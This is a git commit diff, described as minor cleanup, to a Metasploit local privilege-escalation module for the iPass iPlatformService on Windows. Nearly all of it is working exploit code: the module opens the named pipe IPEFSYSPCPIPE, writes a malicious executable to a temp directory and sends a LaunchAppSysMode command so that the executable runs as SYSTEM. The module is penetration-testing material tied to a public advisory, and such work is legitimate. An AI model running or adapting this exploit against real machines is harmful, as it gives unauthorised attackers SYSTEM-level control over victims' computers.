Do minor cleanup

2015-03-13 16:52:26 -05:00 · 2015-03-13 16:52:26 -05:00 · b4de3ce42b
parent b0e730d5ae
commit b4de3ce42b
1 changed files with 53 additions and 51 deletions
--- a/modules/exploits/windows/local/ipass_local_privesc.rb
+++ b/modules/exploits/windows/local/ipass_local_privesc.rb
@ -19,16 +19,15 @@ class Metasploit3 < Msf::Exploit::Local
        The named pipe, \IPEFSYSPCPIPE, can be accessed by normal users to interact
        with the iPass service. The service provides a LaunchAppSysMode command which
        allows to execute arbitrary commands as SYSTEM.
-
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
-          'h0ng10',     # Vulnerability discovery, metasploit module
+          'h0ng10' # Vulnerability discovery, metasploit module
        ],
      'Arch'            => ARCH_X86,
      'Platform'        => 'win',
-      'SessionTypes'    => [ 'meterpreter' ],
+      'SessionTypes'    => ['meterpreter'],
      'DefaultOptions'  =>
        {
          'EXITFUNC'    => 'thread',
@ -44,50 +43,48 @@ class Metasploit3 < Msf::Exploit::Local
        },
      'References'      =>
        [
-          [ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-03.txt' ],
+          ['URL', 'https://www.mogwaisecurity.de/advisories/MSA-2015-03.txt']
        ],
      'DisclosureDate' => 'Mar 12 2015',
      'DefaultTarget'  => 0
    }))

    register_options([
-      OptString.new("WritableDir", [ false, "A directory where we can write files (%TEMP% by default)" ])
+      OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)'])
    ], self.class)

  end

  def check
-    os = sysinfo["OS"]
-    if os =~ /windows/i
-      svc = service_info 'iPlatformService'
-      if svc and svc[:display] =~ /iPlatformService/
-        vprint_good("Found service '#{svc[:display]}'")
-        begin
-          if is_running?
-            vprint_good("Service is running")
-          else
-            vprint_error("Service is not running!")
-          end
-        rescue RuntimeError => e
-          vprint_error("Unable to retrieve service status")
-          return Exploit::CheckCode::Unknown
-        end
+    os = sysinfo['OS']

-        vprint_good("Opening named pipe...")
-        handle = open_named_pipe("\\\\.\\pipe\\IPEFSYSPCPIPE")
-
-        if handle.nil?
-            fail_with(Failure::NoTarget, "\\\\.\\pipe\\IPEFSYSPCPIPE named pipe not found")
-        else
-            vprint_good("\\\\.\\pipe\\IPEFSYSPCPIPE found!")
-            session.railgun.kernel32.CloseHandle(handle)
-        end
-
-        return Exploit::CheckCode::Vulnerable
+    unless os =~ /windows/i
+      return Exploit::CheckCode::Safe
+    end

+    svc = service_info('iPlatformService')
+    if svc && svc[:display] =~ /iPlatformService/
+      vprint_good("Found service '#{svc[:display]}'")
+      if is_running?
+        vprint_good('Service is running')
      else
-        return Exploit::CheckCode::Safe
+        vprint_error('Service is not running!')
      end
+
+      vprint_good('Opening named pipe...')
+      handle = open_named_pipe('\\\\.\\pipe\\IPEFSYSPCPIPE')
+
+      if handle.nil?
+        vprint_error('\\\\.\\pipe\\IPEFSYSPCPIPE named pipe not found')
+        return Exploit::CheckCode::Safe
+      else
+        vprint_good('\\\\.\\pipe\\IPEFSYSPCPIPE found!')
+        session.railgun.kernel32.CloseHandle(handle)
+      end
+
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
    end
  end

@ -95,65 +92,67 @@ class Metasploit3 < Msf::Exploit::Local
  def open_named_pipe(pipe)
    invalid_handle_value = 0xFFFFFFFF

-    r = session.railgun.kernel32.CreateFileA(pipe, "GENERIC_READ | GENERIC_WRITE", 0x3, nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL", 0)
+    r = session.railgun.kernel32.CreateFileA(pipe, 'GENERIC_READ | GENERIC_WRITE', 0x3, nil, 'OPEN_EXISTING', 'FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL', 0)
    handle = r['return']

    return nil if handle == invalid_handle_value

-    return handle
+    handle
  end

  def write_named_pipe(handle, command)
-
    buffer = Rex::Text.to_unicode(command)
    w = client.railgun.kernel32.WriteFile(handle, buffer, buffer.length, 4, nil)

    if w['return'] == false
-        print_error("The was an error writing to pipe, check permissions")
-        return nil
+      print_error('The was an error writing to pipe, check permissions')
+      return false
    end
+
+    true
  end


  def is_running?
    begin
      status = service_status('iPlatformService')
-      return (status and status[:state] == 4)
    rescue RuntimeError => e
-      print_error("Unable to retrieve service status")
+      print_error('Unable to retrieve service status')
      return false
    end
+
+    return status && status[:state] == 4
  end

  def exploit
    if is_system?
-      fail_with(Exploit::Failure::None, 'Session is already elevated')
+      fail_with(Failure::NoTarget, 'Session is already elevated')
    end

    handle = open_named_pipe("\\\\.\\pipe\\IPEFSYSPCPIPE")

    if handle.nil?
-        fail_with(Failure::NoTarget, "\\\\.\\pipe\\IPEFSYSPCPIPE named pipe not found")
+      fail_with(Failure::NoTarget, "\\\\.\\pipe\\IPEFSYSPCPIPE named pipe not found")
    else
-        print_status("Opended \\\\.\\pipe\\IPEFSYSPCPIPE! Proceeding...")
+      print_status("Opended \\\\.\\pipe\\IPEFSYSPCPIPE! Proceeding...")
    end

-    if datastore["WritableDir"] and not datastore["WritableDir"].empty?
-        temp_dir = datastore["WritableDir"]
+    if datastore['WritableDir'] and not datastore['WritableDir'].empty?
+      temp_dir = datastore['WritableDir']
    else
-        temp_dir = client.sys.config.getenv('TEMP')
+      temp_dir = client.sys.config.getenv('TEMP')
    end

    print_status("Using #{temp_dir} to drop malicious exe")

    begin
-        cd(temp_dir)
+      cd(temp_dir)
    rescue Rex::Post::Meterpreter::RequestError
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Config, "Failed to use the #{temp_dir} directory")
    end

-    print_status("Writing malicious exe to remote filesystem")
+    print_status('Writing malicious exe to remote filesystem')
    write_path = pwd
    exe_name = "#{rand_text_alpha(10 + rand(10))}.exe"

@ -162,18 +161,21 @@ class Metasploit3 < Msf::Exploit::Local
      register_file_for_cleanup("#{write_path}\\#{exe_name}")
    rescue Rex::Post::Meterpreter::RequestError
      session.railgun.kernel32.CloseHandle(handle)
-      fail_with(Failure::Config, "Failed to drop payload into #{temp_dir}")
+      fail_with(Failure::Unknown, "Failed to drop payload into #{temp_dir}")
    end

-    print_status("Sending LauchAppSysMode command")
+    print_status('Sending LauchAppSysMode command')

    begin
-      write_named_pipe(handle, "iPass.EventsAction.LaunchAppSysMode #{write_path}\\#{exe_name};;;")
+      write_res = write_named_pipe(handle, "iPass.EventsAction.LaunchAppSysMode #{write_path}\\#{exe_name};;;")
    rescue Rex::Post::Meterpreter::RequestError
      session.railgun.kernel32.CloseHandle(handle)
-      fail_with(Failure::Config, "Failed to write to pipe")
+      fail_with(Failure::Unknown, 'Failed to write to pipe')
    end

+    unless write_res
+      fail_with(Failure::Unknown, 'Failed to write to pipe')
+    end
  end

 end